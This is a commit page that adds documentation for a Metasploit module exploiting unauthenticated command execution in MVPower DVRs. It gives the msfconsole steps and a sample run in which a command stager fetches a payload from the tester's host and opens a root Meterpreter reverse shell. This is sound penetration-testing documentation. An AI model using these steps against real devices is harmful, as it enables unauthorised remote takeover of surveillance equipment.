Skip to content

Commit c9e0949

Browse files
committed
Add documentation
1 parent 5d3a4cc commit c9e0949

File tree

1 file changed

+43
-0
lines changed

1 file changed

+43
-0
lines changed
Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,43 @@
1+
## Vulnerable Application
2+
3+
This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.
4+
5+
This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).
6+
7+
The TV-7108HE model is also reportedly affected, but untested.
8+
9+
10+
## Verification Steps
11+
12+
1. Start `msfconsole`
13+
2. Do: `use exploit/linux/http/mvpower_dvr_shell_exec`
14+
3. Do: `set rhost [IP]`
15+
4. Do: `set lhost [IP]`
16+
5. Do: `run`
17+
6. You should get a session
18+
19+
20+
## Example Run
21+
22+
23+
```
24+
msf exploit(mvpower_dvr_shell_exec) > run
25+
26+
[*] Started reverse TCP handler on 10.1.1.197:4444
27+
[*] 10.1.1.191:80 - Connecting to target
28+
[+] 10.1.1.191:80 - Target is vulnerable!
29+
[*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
30+
[*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
31+
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
32+
[*] Command Stager progress - 100.00% done (117/117 bytes)
33+
[*] Server stopped.
34+
35+
meterpreter > getuid
36+
Server username: uid=0, gid=0, euid=0, egid=0
37+
meterpreter > sysinfo
38+
Computer : 10.1.1.191
39+
OS : (Linux 3.0.8)
40+
Architecture : armv7l
41+
Meterpreter : armle/linux
42+
meterpreter >
43+
```

0 commit comments

Comments
 (0)